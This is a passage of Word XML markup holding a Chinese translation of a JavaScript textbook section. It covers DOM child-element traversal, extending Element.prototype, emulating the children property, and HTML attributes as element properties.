      </w:r>
      <w:r>
        <w:t>数组存在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>0)n+=e.children.length;//</w:t>
      </w:r>
      <w:r>
        <w:t>转换负的</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>为数组索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>0)return null;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果它仍然为负，说明没有子元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return e.children[n];//</w:t>
      </w:r>
      <w:r>
        <w:t>返回指定的子元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>没有</w:t>
      </w:r>
      <w:r>
        <w:t>children</w:t>
      </w:r>
      <w:r>
        <w:t>数组，找到第一个子元素并向前数，或找到最后一个子元素并往回数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=0){//n</w:t>
      </w:r>
      <w:r>
        <w:t>非负：从第一个子元素向前数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>找到元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个子元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.firstElementChild)e=e.firstElementChild;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(e=e.firstChild;e</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>e.nodeType!==1;e=e.nextSibling)/*</w:t>
      </w:r>
      <w:r>
        <w:t>空循环</w:t>
      </w:r>
      <w:r>
        <w:t>*/;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return sibling(e,n);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回第一个子元素的第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个兄弟元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//n</w:t>
      </w:r>
      <w:r>
        <w:t>为负：从最后一个子元素往回数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.lastElementChild)e=e.lastElementChild;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(e=e.lastChild;e</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>e.nodeType!==1;e=e.previousSibling)/*</w:t>
      </w:r>
      <w:r>
        <w:t>空循环</w:t>
      </w:r>
      <w:r>
        <w:t>*/;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return sibling(e,n+1);//+1</w:t>
      </w:r>
      <w:r>
        <w:t>来转化最后</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>个子元素为最后</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>个兄弟元素</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7"/>
      </w:pPr>
      <w:r>
        <w:t>自定义</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所有当前的浏览器（包含</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>，除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE 7</w:t>
      </w:r>
      <w:r>
        <w:t>及其更早的版本）都实现了</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>，故类似</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HT</w:t>
      </w:r>
      <w:r>
        <w:t>MLDocument</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>等类型都像</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>一样是类。它们不是构造函数（将在本章后面看到如何创建新的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象），但它们有原型对象，可以用自定义方法扩展它：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Element.prototype.next=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this.nextElementSibling)return this.nextElementSibling;var sib=this.nextSibling;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(sib</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>sib.nodeType!==1)sib=sib.nextSibli</w:t>
      </w:r>
      <w:r>
        <w:t>ng;return sib;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>15-2</w:t>
      </w:r>
      <w:r>
        <w:t>中的函数并没有定义为</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的方法是因为这种技术在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 7</w:t>
      </w:r>
      <w:r>
        <w:t>中不支持。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管如此，如果希望将</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>专有的特性在除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>之外的其他浏览器中得以实现，这种扩展</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>类型的能力是非常有用的。从上面注意到，</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的非标准</w:t>
      </w:r>
      <w:r>
        <w:t>children</w:t>
      </w:r>
      <w:r>
        <w:t>属性由</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>首先引入，并已经被其他浏览器所采纳。类似</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 3.0</w:t>
      </w:r>
      <w:r>
        <w:t>不支持它的浏览器中可以使用以下代码模拟此属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在不包含此属性的非</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中模拟</w:t>
      </w:r>
      <w:r>
        <w:t>Element.children</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意，返回值为静态数组，</w:t>
      </w:r>
      <w:r>
        <w:t>而不是实时的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!document.documentElement.children){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Element.prototype.__defineGetter__("children",function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var kids=[];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var c=this.firstChild;c!=null;c=c.nextSibling)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(c.nodeType===1)kids.push(c);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return kids;</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5"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>__defineGetter__</w:t>
      </w:r>
      <w:r>
        <w:t>方法（在</w:t>
      </w:r>
      <w:r>
        <w:t>6.7.1</w:t>
      </w:r>
      <w:r>
        <w:t>节中介绍）完全是非标准的，但它用来移植类似的代码非常完美。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="364" w:name="15_4_Shu_Xing_"/>
      <w:r>
        <w:t>15.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="364"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素由一个标签和一组称为属性（</w:t>
      </w:r>
      <w:r>
        <w:t>attribute</w:t>
      </w:r>
      <w:r>
        <w:t>）的名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对组成。例如，＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素定义了一个超链接，它的</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>属性值作为链接的目的地址。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的属性值在代表这些元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性（</w:t>
      </w:r>
      <w:r>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:t>）中是可用的。</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>还定义了另外的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>来获取或设置</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>属性值和非标准的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。详细信息见以下各节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="365" w:name="15_4_1_HTMLShu_Xing_Zuo_Wei_ElementDe_Sh"/>
      <w:r>
        <w:t>15.4.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性作为</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="365"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写属性，它们映射了元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>定义了通用的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>属性（如</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>、标题</w:t>
      </w:r>
      <w:r>
        <w:t>lang</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:r>
        <w:t>）的属性，以及事件处理程序属性（如</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>）。特定的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>子类型为其元素定义了特定的属性。例如，查询一张图片的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，可以使用表示＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var image=document.getElementById("myimage");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var imgurl=image.s</w:t>
      </w:r>
      <w:r>
        <w:t>rc;//src</w:t>
      </w:r>
      <w:r>
        <w:t>属性是图片的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>image.id==="myimage"//</w:t>
      </w:r>
      <w:r>
        <w:t>判定要查找图片的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>同样地，可以为一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素设置表单提交的属性，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var f=document.forms[0];//</w:t>
      </w:r>
      <w:r>
        <w:t>文档中第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.action="http://www.example.com/submit.php";//</w:t>
      </w:r>
      <w:r>
        <w:t>设置提交至的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.method="POST";//HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性名不区分大小写，但</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性名则大小写敏感。从</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性名转换到</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性名应该采用小写。但是，如果属性名包含不止一个单词，则将除了第一个单词以外的单词的首字母大写，例如：</w:t>
      </w:r>
      <w:r>
        <w:t>defaultChecked</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>tabIndex</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有些</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性名在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中是保留字。对于这些属性，一般的规则是为属性名加前缀</w:t>
      </w:r>
      <w:r>
        <w:t>"html"</w:t>
      </w:r>
      <w:r>
        <w:t>。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>属性（＜</w:t>
      </w:r>
      <w:r>
        <w:t>lable</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素）在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中变为</w:t>
      </w:r>
      <w:r>
        <w:t>htmlFor</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t>"class"</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中是保留字（但还未使用），它是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>非常重要的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性，是上面规则的一个例外：在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScr</w:t>
      </w:r>
      <w:r>
        <w:t>ipt</w:t>
      </w:r>
      <w:r>
        <w:t>代码中它变为</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>。我们将在第</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>章中再次见到</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值通常是字符串。当属性为布尔值或数值（例如，＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>defaultChecked</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>maxLength</w:t>
      </w:r>
      <w:r>
        <w:t>属性），属性也是布尔值或数值，而不是字符串。事件处理程序属性值总是为</w:t>
      </w:r>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>对象（或</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>规范定义了一个新的属性（如＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞和相关元素的</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>属性）用以将元素</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>转换为实际的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象。最后，任何</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性值是</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDecl</w:t>
      </w:r>
      <w:r>
        <w:t>aration</w:t>
      </w:r>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>象，而不是字符串。我们将在第</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>章中看到关于这个重要属性的更多信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，这个基于属性的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>用来获取和设置属性值，但没有定义任何从元素中删除属性的方法。奇怪的是，</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作符也无法完成此目的。下一节描述一种可以实现此目的的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="366" w:name="15_4_2_Huo_Qu_He_She_Zhi_Fei_Biao_Zhun_H"/>
      <w:r>
        <w:t>15.4.2</w:t>
      </w:r>
      <w:r>
